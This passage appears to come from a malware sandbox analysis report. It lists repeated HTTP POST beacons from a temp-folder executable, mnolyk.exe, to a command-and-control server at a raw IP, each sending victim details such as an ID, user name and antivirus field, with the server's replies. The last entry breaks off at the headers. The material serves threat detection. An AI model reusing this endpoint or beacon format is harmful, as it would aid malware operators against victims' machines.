                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:20.945394039 CET615OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.007967949 CET615INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    416192.168.2.35011962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:21.184098005 CET616OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.249125004 CET616INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    417192.168.2.35012062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:21.420479059 CET617OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.485718012 CET617INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    418192.168.2.35012162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:21.657461882 CET618OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.722080946 CET618INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    419192.168.2.35012262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:21.889662981 CET619OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.954339027 CET619INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    42192.168.2.34974462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:27.200875044 CET243OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:27.266582966 CET243INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    420192.168.2.35012362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:22.133749962 CET620OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:22.198437929 CET620INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    421192.168.2.35012462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:22.455838919 CET621OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:22.522018909 CET621INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    422192.168.2.35012562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:22.703938961 CET622OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:22.768277884 CET622INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    423192.168.2.35012662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:22.981983900 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:23.047378063 CET623INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    424192.168.2.35012762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:23.222781897 CET624OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:23.285810947 CET624INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    425192.168.2.35012862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:23.470232964 CET625OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:23.533766031 CET625INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    426192.168.2.35012962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:23.715965033 CET626OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:23.778614998 CET626INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    427192.168.2.35013062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:23.953140974 CET627OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:24.018573999 CET627INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    428192.168.2.35013162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:24.191823006 CET628OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:24.256805897 CET628INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    429192.168.2.35013262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:24.436847925 CET629OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:24.499838114 CET629INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    43192.168.2.34974562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:27.438465118 CET244OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:27.502505064 CET244INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    430192.168.2.35013362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:24.671407938 CET630OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:24.736025095 CET630INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    431192.168.2.35013462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:24.907486916 CET631OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:24.970339060 CET631INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    432192.168.2.35013562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:25.140151024 CET632OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.203968048 CET632INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
